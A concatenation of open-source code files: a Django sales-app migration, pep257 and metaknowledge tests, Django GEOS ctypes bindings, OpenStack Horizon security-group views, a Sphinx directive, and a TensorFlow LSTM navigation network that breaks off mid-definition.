'amount_display': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_opportunity_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'closed_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'expected_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'lead': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Lead']", 'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'probability': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '3', 'decimal_places': '0', 'blank': 'True'}),
'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sales.Product']", 'symmetrical': 'False'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
},
'sales.orderedproduct': {
'Meta': {'ordering': "['product']", 'object_name': 'OrderedProduct', '_ormbases': ['core.Object']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'discount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '4', 'decimal_places': '2'}),
'fulfilled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleOrder']"}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']"}),
'quantity': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '30', 'decimal_places': '2'}),
'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'rate_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'subscription': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Subscription']", 'null': 'True', 'blank': 'True'}),
'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Tax']", 'null': 'True', 'blank': 'True'})
},
'sales.product': {
'Meta': {'ordering': "['code']", 'object_name': 'Product', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'buy_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['sales.Product']"}),
'product_type': ('django.db.models.fields.CharField', [], {'default': "'good'", 'max_length': '32'}),
'runout_action': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'sell_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'stock_quantity': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'supplier_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'sales.saleorder': {
'Meta': {'ordering': "['-datetime']", 'object_name': 'SaleOrder', '_ormbases': ['core.Object']},
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_saleorder_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'opportunity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Opportunity']", 'null': 'True', 'blank': 'True'}),
'payment': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['finance.Transaction']", 'null': 'True', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"}),
'total': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'total_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'sales.salesource': {
'Meta': {'ordering': "('-active', 'name')", 'object_name': 'SaleSource', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
},
'sales.salestatus': {
'Meta': {'ordering': "('hidden', '-active', 'name')", 'object_name': 'SaleStatus', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'use_leads': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_opportunities': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_sales': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'sales.subscription': {
'Meta': {'ordering': "['expiry']", 'object_name': 'Subscription', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'cycle_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'cycle_period': ('django.db.models.fields.CharField', [], {'default': "'month'", 'max_length': '32'}),
'details': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'expiry': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'})
}
}
complete_apps = ['sales']
| mit |
jmullan/pep257 | src/tests/test_definitions.py | 3 | 5129 | import os
import pytest
from ..pep257 import (StringIO, TokenStream, Parser, Error, check,
Module, Class, Method, Function, NestedFunction,
ErrorRegistry, AllError)
_ = type('', (), dict(__repr__=lambda *a: '_', __eq__=lambda *a: True))()
parse = Parser()
source = '''
"""Module."""
__all__ = ('a', 'b'
'c',)
def function():
"Function."
def nested_1():
"""Nested."""
if True:
def nested_2():
pass
class class_(object):
"""Class."""
def method_1(self):
"""Method."""
def method_2(self):
def nested_3(self):
"""Nested."""
'''
source_alt = '''
__all__ = ['a', 'b'
'c',]
'''
source_alt_nl_at_bracket = '''
__all__ = [
# Inconvenient comment.
'a', 'b' 'c',]
'''
source_unicode_literals = '''
from __future__ import unicode_literals
'''
source_multiple_future_imports = '''
from __future__ import (nested_scopes as ns,
unicode_literals)
'''
source_complex_all = '''
import foo
import bar
__all__ = (foo.__all__ +
bar.__all)
'''
def test_parser():
dunder_all = ('a', 'bc')
module = parse(StringIO(source), 'file.py')
assert len(list(module)) == 8
assert Module('file.py', _, 1, len(source.split('\n')),
_, '"""Module."""', _, _, dunder_all, {}) == \
module
function, class_ = module.children
assert Function('function', _, _, _, _, '"Function."', _,
module) == function
assert Class('class_', _, _, _, _, '"""Class."""', _, module) == class_
nested_1, nested_2 = function.children
assert NestedFunction('nested_1', _, _, _, _,
'"""Nested."""', _, function) == nested_1
assert NestedFunction('nested_2', _, _, _, _, None, _,
function) == nested_2
assert nested_1.is_public is False
method_1, method_2 = class_.children
assert method_1.parent == method_2.parent == class_
assert Method('method_1', _, _, _, _, '"""Method."""', _,
class_) == method_1
assert Method('method_2', _, _, _, _, None, _, class_) == method_2
nested_3, = method_2.children
assert NestedFunction('nested_3', _, _, _, _,
'"""Nested."""', _, method_2) == nested_3
assert nested_3.module == module
assert nested_3.all == dunder_all
module = parse(StringIO(source_alt), 'file_alt.py')
assert Module('file_alt.py', _, 1, len(source_alt.split('\n')),
_, None, _, _, dunder_all, {}) == module
module = parse(StringIO(source_alt_nl_at_bracket), 'file_alt_nl.py')
assert Module('file_alt_nl.py', _, 1,
len(source_alt_nl_at_bracket.split('\n')), _, None, _, _,
dunder_all, {}) == module
module = parse(StringIO(source_unicode_literals), 'file_ucl.py')
assert Module('file_ucl.py', _, 1,
_, _, None, _, _,
_, {'unicode_literals': True}) == module
module = parse(StringIO(source_multiple_future_imports), 'file_mfi.py')
assert Module('file_mfi.py', _, 1,
_, _, None, _, _,
_, {'unicode_literals': True, 'nested_scopes': True}) \
== module
assert module.future_imports['unicode_literals']
with pytest.raises(AllError):
parse(StringIO(source_complex_all), 'file_complex_all.py')
def _test_module():
module = Module(source, 'module.py')
assert module.source == source
assert module.parent is None
assert module.name == 'module'
assert module.docstring == '"""Module docstring."""'
assert module.is_public
function, = module.children
assert function.source.startswith('def function')
assert function.source.endswith('pass\n')
assert function.parent is module
assert function.name == 'function'
assert function.docstring == '"""Function docstring."""'
def test_token_stream():
stream = TokenStream(StringIO('hello#world'))
assert stream.current.value == 'hello'
assert stream.line == 1
assert stream.move().value == 'hello'
assert stream.current.value == '#world'
assert stream.line == 1
def test_pep257():
"""Run domain-specific tests from test.py file."""
test_cases = ('test', 'unicode_literals', 'nested_class')
for test_case in test_cases:
case_module = __import__('test_cases.{0}'.format(test_case),
globals=globals(),
locals=locals(),
fromlist=['expectation'],
level=1)
# from .test_cases import test
results = list(check([os.path.join(os.path.dirname(__file__),
'test_cases', test_case + '.py')],
select=set(ErrorRegistry.get_error_codes())))
for error in results:
assert isinstance(error, Error)
results = set([(e.definition.name, e.message) for e in results])
assert case_module.expectation.expected == results
| mit |
networks-lab/metaknowledge | metaknowledge/tests/test_scopus.py | 2 | 2670 | #Written by Reid McIlroy-Young for Dr. John McLevey, University of Waterloo 2016
import unittest
import metaknowledge
import os
class TestScopus(unittest.TestCase):
def setUp(self):
metaknowledge.VERBOSE_MODE = False
self.RC = metaknowledge.RecordCollection("metaknowledge/tests/scopus_testing.csv.scopus")
self.R = self.RC.peek()
def test_creation(self):
Rstart = self.RC.peek()
R = metaknowledge.ScopusRecord(Rstart._fieldDict)
self.assertEqual(R, Rstart)
with open("metaknowledge/tests/scopus_testing.csv.scopus") as f:
f.read(1)
header = f.readline()[:-1].split(',')
R = metaknowledge.ScopusRecord(f.readline(), header = header)
self.assertEqual(R.id, 'EID:2-s2.0-84963944162')
R = metaknowledge.ScopusRecord(f.readline(), header = header)
self.assertEqual(R.id, 'EID:2-s2.0-84943362392')
with self.assertRaises(TypeError):
R = metaknowledge.ScopusRecord(12345678)
R = metaknowledge.ScopusRecord(",2132,4,3fdgf,fgdgdfdg,dgfdg,,,,,,,,,,,,,,,,,,,2e5r6t789765432\n")
self.assertTrue(R.bad)
with self.assertRaises(metaknowledge.BadScopusRecord):
R.writeRecord('not a file')
def test_isCollection(self):
self.assertIsInstance(self.RC, metaknowledge.RecordCollection)
def test_isScopus(self):
self.assertIsInstance(self.R, metaknowledge.ScopusRecord)
def test_specials(self):
for R in self.RC:
for s in metaknowledge.scopus.scopusSpecialTagToFunc.keys():
self.assertIsInstance(R.get(s), (str, type(None), list, int, metaknowledge.Citation))
def test_allFields(self):
for R in self.RC:
for k,v in R.items():
self.assertIsInstance(k, str)
self.assertIsInstance(v, (str, list, int))
def test_graphs(self):
self.assertEqual(metaknowledge.graphStats(self.RC.networkCoAuthor(), sentenceString = True), "The graph has 1798 nodes, 89236 edges, 36 isolates, 15 self loops, a density of 0.0552422 and a transitivity of 0.994673")
self.assertEqual(metaknowledge.graphStats(self.RC.networkCitation(), sentenceString = True), "The graph has 10026 nodes, 10362 edges, 0 isolates, 0 self loops, a density of 0.000103094 and a transitivity of 0")
def test_write(self):
fileName = 'tempFile.scopus.tmp'
self.RC.writeFile(fileName)
self.assertEqual(os.path.getsize(fileName), os.path.getsize("metaknowledge/tests/scopus_testing.csv.scopus") + 11511) #Not quite identical due to double quotes
os.remove(fileName)
| gpl-2.0 |
pasqualguerrero/django | django/contrib/gis/geos/prototypes/geom.py | 288 | 4069 | from ctypes import POINTER, c_char_p, c_int, c_size_t, c_ubyte
from django.contrib.gis.geos.libgeos import CS_PTR, GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom, check_minus_one, check_sized_string, check_string, check_zero,
)
# This is the return type used by binary output (WKB, HEX) routines.
c_uchar_p = POINTER(c_ubyte)
# We create a simple subclass of c_char_p here because when the response
# type is set to c_char_p, you get a _Python_ string and there's no way
# to access the string's address inside the error checking function.
# In other words, you can't free the memory allocated inside GEOS. Previously,
# the return type would just be omitted and the integer address would be
# used -- but this allows us to be specific in the function definition and
# keeps the reference so it may be free'd.
class geos_char_p(c_char_p):
pass
# ### ctypes factory classes ###
class BinConstructor(GEOSFuncFactory):
"Generates a prototype for binary construction (HEX, WKB) GEOS routines."
argtypes = [c_char_p, c_size_t]
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
# HEX & WKB output
class BinOutput(GEOSFuncFactory):
"Generates a prototype for the routines that return a sized string."
argtypes = [GEOM_PTR, POINTER(c_size_t)]
restype = c_uchar_p
errcheck = staticmethod(check_sized_string)
class GeomOutput(GEOSFuncFactory):
"For GEOS routines that return a geometry."
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
def get_func(self, argtypes):
self.argtypes = argtypes
return super(GeomOutput, self).get_func()
class IntFromGeom(GEOSFuncFactory):
"Argument is a geometry, return type is an integer."
argtypes = [GEOM_PTR]
restype = c_int
def get_func(self, zero=False):
if zero:
self.errcheck = check_zero
else:
self.errcheck = check_minus_one
return super(IntFromGeom, self).get_func()
class StringFromGeom(GEOSFuncFactory):
"Argument is a Geometry, return type is a string."
argtypes = [GEOM_PTR]
restype = geos_char_p
errcheck = staticmethod(check_string)
# ### ctypes prototypes ###
# Deprecated creation routines from WKB, HEX, WKT
from_hex = BinConstructor('GEOSGeomFromHEX_buf')
from_wkb = BinConstructor('GEOSGeomFromWKB_buf')
from_wkt = GeomOutput('GEOSGeomFromWKT', [c_char_p])
# Deprecated output routines
to_hex = BinOutput('GEOSGeomToHEX_buf')
to_wkb = BinOutput('GEOSGeomToWKB_buf')
to_wkt = StringFromGeom('GEOSGeomToWKT')
# The GEOS geometry type, typeid, num_coordites and number of geometries
geos_normalize = IntFromGeom('GEOSNormalize')
geos_type = StringFromGeom('GEOSGeomType')
geos_typeid = IntFromGeom('GEOSGeomTypeId')
get_dims = IntFromGeom('GEOSGeom_getDimensions', zero=True)
get_num_coords = IntFromGeom('GEOSGetNumCoordinates')
get_num_geoms = IntFromGeom('GEOSGetNumGeometries')
# Geometry creation factories
create_point = GeomOutput('GEOSGeom_createPoint', [CS_PTR])
create_linestring = GeomOutput('GEOSGeom_createLineString', [CS_PTR])
create_linearring = GeomOutput('GEOSGeom_createLinearRing', [CS_PTR])
# Polygon and collection creation routines are special and will not
# have their argument types defined.
create_polygon = GeomOutput('GEOSGeom_createPolygon', None)
create_collection = GeomOutput('GEOSGeom_createCollection', None)
# Ring routines
get_extring = GeomOutput('GEOSGetExteriorRing', [GEOM_PTR])
get_intring = GeomOutput('GEOSGetInteriorRingN', [GEOM_PTR, c_int])
get_nrings = IntFromGeom('GEOSGetNumInteriorRings')
# Collection Routines
get_geomn = GeomOutput('GEOSGetGeometryN', [GEOM_PTR, c_int])
# Cloning
geom_clone = GEOSFuncFactory('GEOSGeom_clone', argtypes=[GEOM_PTR], restype=GEOM_PTR)
# Destruction routine.
destroy_geom = GEOSFuncFactory('GEOSGeom_destroy', argtypes=[GEOM_PTR])
# SRID routines
geos_get_srid = GEOSFuncFactory('GEOSGetSRID', argtypes=[GEOM_PTR], restype=c_int)
geos_set_srid = GEOSFuncFactory('GEOSSetSRID', argtypes=[GEOM_PTR, c_int])
| bsd-3-clause |
jumpstarter-io/horizon | openstack_dashboard/dashboards/project/access_and_security/security_groups/views.py | 15 | 5229 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing instances.
"""
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import tables
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.utils import filters
from openstack_dashboard.dashboards.project.access_and_security.\
security_groups import forms as project_forms
from openstack_dashboard.dashboards.project.access_and_security.\
security_groups import tables as project_tables
class DetailView(tables.DataTableView):
table_class = project_tables.RulesTable
template_name = 'project/access_and_security/security_groups/detail.html'
@memoized.memoized_method
def _get_data(self):
sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])
try:
return api.network.security_group_get(self.request, sg_id)
except Exception:
redirect = reverse('horizon:project:access_and_security:index')
exceptions.handle(self.request,
_('Unable to retrieve security group.'),
redirect=redirect)
def get_data(self):
data = self._get_data()
if data is None:
return []
return sorted(data.rules, key=lambda rule: (rule.ip_protocol,
rule.from_port))
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
context["security_group"] = self._get_data()
return context
class UpdateView(forms.ModalFormView):
form_class = project_forms.UpdateGroup
template_name = 'project/access_and_security/security_groups/update.html'
success_url = reverse_lazy('horizon:project:access_and_security:index')
@memoized.memoized_method
def get_object(self):
sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])
try:
return api.network.security_group_get(self.request, sg_id)
except Exception:
msg = _('Unable to retrieve security group.')
url = reverse('horizon:project:access_and_security:index')
exceptions.handle(self.request, msg, redirect=url)
def get_context_data(self, **kwargs):
context = super(UpdateView, self).get_context_data(**kwargs)
context["security_group"] = self.get_object()
return context
def get_initial(self):
security_group = self.get_object()
return {'id': self.kwargs['security_group_id'],
'name': security_group.name,
'description': security_group.description}
class AddRuleView(forms.ModalFormView):
form_class = project_forms.AddRule
template_name = 'project/access_and_security/security_groups/add_rule.html'
def get_success_url(self):
sg_id = self.kwargs['security_group_id']
return reverse("horizon:project:access_and_security:"
"security_groups:detail", args=[sg_id])
def get_context_data(self, **kwargs):
context = super(AddRuleView, self).get_context_data(**kwargs)
context["security_group_id"] = self.kwargs['security_group_id']
return context
def get_initial(self):
return {'id': self.kwargs['security_group_id']}
def get_form_kwargs(self):
kwargs = super(AddRuleView, self).get_form_kwargs()
try:
groups = api.network.security_group_list(self.request)
except Exception:
groups = []
exceptions.handle(self.request,
_("Unable to retrieve security groups."))
security_groups = []
for group in groups:
if group.id == filters.get_int_or_uuid(
self.kwargs['security_group_id']):
security_groups.append((group.id,
_("%s (current)") % group.name))
else:
security_groups.append((group.id, group.name))
kwargs['sg_list'] = security_groups
return kwargs
class CreateView(forms.ModalFormView):
form_class = project_forms.CreateGroup
template_name = 'project/access_and_security/security_groups/create.html'
success_url = reverse_lazy('horizon:project:access_and_security:index')
| apache-2.0 |
safy-group/safy-api | vendor/doctrine/orm/docs/en/_exts/configurationblock.py | 2577 | 3506 | #Copyright (c) 2010 Fabien Potencier
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
from docutils.parsers.rst import Directive, directives
from docutils import nodes
from string import upper
class configurationblock(nodes.General, nodes.Element):
pass
class ConfigurationBlock(Directive):
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
formats = {
'html': 'HTML',
'xml': 'XML',
'php': 'PHP',
'yaml': 'YAML',
'jinja': 'Twig',
'html+jinja': 'Twig',
'jinja+html': 'Twig',
'php+html': 'PHP',
'html+php': 'PHP',
'ini': 'INI',
'php-annotations': 'Annotations',
}
def run(self):
env = self.state.document.settings.env
node = nodes.Element()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
entries = []
for i, child in enumerate(node):
if isinstance(child, nodes.literal_block):
# add a title (the language name) before each block
#targetid = "configuration-block-%d" % env.new_serialno('configuration-block')
#targetnode = nodes.target('', '', ids=[targetid])
#targetnode.append(child)
innernode = nodes.emphasis(self.formats[child['language']], self.formats[child['language']])
para = nodes.paragraph()
para += [innernode, child]
entry = nodes.list_item('')
entry.append(para)
entries.append(entry)
resultnode = configurationblock()
resultnode.append(nodes.bullet_list('', *entries))
return [resultnode]
def visit_configurationblock_html(self, node):
self.body.append(self.starttag(node, 'div', CLASS='configuration-block'))
def depart_configurationblock_html(self, node):
self.body.append('</div>\n')
def visit_configurationblock_latex(self, node):
pass
def depart_configurationblock_latex(self, node):
pass
def setup(app):
app.add_node(configurationblock,
html=(visit_configurationblock_html, depart_configurationblock_html),
latex=(visit_configurationblock_latex, depart_configurationblock_latex))
app.add_directive('configuration-block', ConfigurationBlock)
| mit |
andzaytsev/deepnav | GA3C_LSTM_NAV_D/NetworkVP.py | 1 | 19714 | # Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import numpy as np
import tensorflow as tf
from Config import Config
class NetworkVP:
def __init__(self, device, model_name, num_actions):
self.device = device
self.model_name = model_name
self.num_actions = num_actions
self.img_width = Config.IMAGE_WIDTH
self.img_height = Config.IMAGE_HEIGHT
self.img_channels = Config.IMAGE_DEPTH * Config.STACKED_FRAMES
self.learning_rate = Config.LEARNING_RATE_START
self.beta = Config.BETA_START
self.log_epsilon = Config.LOG_EPSILON
self.graph = tf.Graph()
with self.graph.as_default() as g:
with tf.device(self.device):
self._create_graph()
self.sess = tf.Session(
graph=self.graph,
config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False,
gpu_options=tf.GPUOptions(allow_growth=True)))
self.sess.run(tf.global_variables_initializer())
if Config.TENSORBOARD: self._create_tensor_board()
if Config.LOAD_CHECKPOINT or Config.SAVE_MODELS:
vars = tf.global_variables()
self.saver = tf.train.Saver({var.name: var for var in vars}, max_to_keep=0)
def _create_graph(self):
self.x = tf.placeholder(
tf.float32, [None, self.img_height, self.img_width, self.img_channels], name='X')
self.y_r = tf.placeholder(tf.float32, [None], name='Yr')
self.p_rewards = tf.placeholder(tf.float32, [None, 1], name='p_rewards')
self.aux_inp = tf.placeholder(tf.float32, shape=[None, self.num_actions+Config.VEL_DIM], name='aux_input')
self.depth_labels = [tf.placeholder(tf.int32, shape=[None, Config.DEPTH_QUANTIZATION])]*Config.DEPTH_PIXELS
self.var_beta = tf.placeholder(tf.float32, name='beta', shape=[])
self.var_learning_rate = tf.placeholder(tf.float32, name='lr', shape=[])
self.global_step = tf.Variable(0, trainable=False, name='step')
# As implemented in A3C paper
self.n1 = self.conv2d_layer(self.x, 8, 16, 'conv11', strides=[1, 4, 4, 1])
self.n2 = self.conv2d_layer(self.n1, 4, 32, 'conv12', strides=[1, 2, 2, 1])
self.action_index = tf.placeholder(tf.float32, name='action_index', shape=[None, self.num_actions])
_input = self.n2
flatten_input_shape = _input.get_shape()
nb_elements = flatten_input_shape[1] * flatten_input_shape[2] * flatten_input_shape[3]
self.flat = tf.reshape(_input, shape=[-1, nb_elements._value])
self.enc_out = self.dense_layer(self.flat, 256, 'dense1') # encoder output
self.d1 = self.dense_layer(self.enc_out, 128, 'depth1')
# input to first LSTM. Add previous step rewards
self.aux1 = tf.concat((self.enc_out, self.p_rewards), axis=1)
lstm_layers = Config.NUM_LSTMS
self.seq_len = tf.placeholder(tf.int32, name='seq_len', shape=[]) # LSTM sequence length
self.state_in = [] # LSTM input state
self.state_out = [] # LSTM output state
with tf.variable_scope('lstm1'):
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_in_1 = tf.placeholder(tf.float32, name='c_1', shape=[None, lstm_cell.state_size.c])
h_in_1 = tf.placeholder(tf.float32, name='h_1', shape=[None, lstm_cell.state_size.h])
self.state_in.append((c_in_1, h_in_1))
# using tf.stack here since tf doesn't like when integers and
# placeholders are mixed together in the desired shape
rnn_in = tf.reshape(self.aux1, tf.stack([-1, self.seq_len, self.aux1.shape[1]]))
init_1 = tf.contrib.rnn.LSTMStateTuple(c_in_1, h_in_1)
lstm_outputs_1, lstm_state_1 = tf.nn.dynamic_rnn(lstm_cell, rnn_in,
initial_state=init_1, time_major=False)
lstm_outputs_1 = tf.reshape(lstm_outputs_1, [-1, 256])
self.state_out.append(tuple(lstm_state_1))
# input to second LSTM. Add previous step rewards
self.aux2 = tf.concat((self.enc_out, lstm_outputs_1), axis=1)
self.aux2 = tf.concat((self.aux2, self.aux_inp), axis=1)
with tf.variable_scope('lstm2'):
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_in_2 = tf.placeholder(tf.float32, name='c_2', shape=[None, lstm_cell.state_size.c])
h_in_2 = tf.placeholder(tf.float32, name='h_2', shape=[None, lstm_cell.state_size.h])
self.state_in.append((c_in_2, h_in_2))
rnn_in = tf.reshape(self.aux2, tf.stack([-1, self.seq_len, self.aux2.shape[1]]))
init_2 = tf.contrib.rnn.LSTMStateTuple(c_in_2, h_in_2)
lstm_outputs_2, lstm_state_2 = tf.nn.dynamic_rnn(lstm_cell, rnn_in,
initial_state=init_2, time_major=False)
self.state_out.append(tuple(lstm_state_1))
self.rnn_out = tf.reshape(lstm_outputs_2, [-1, 256])
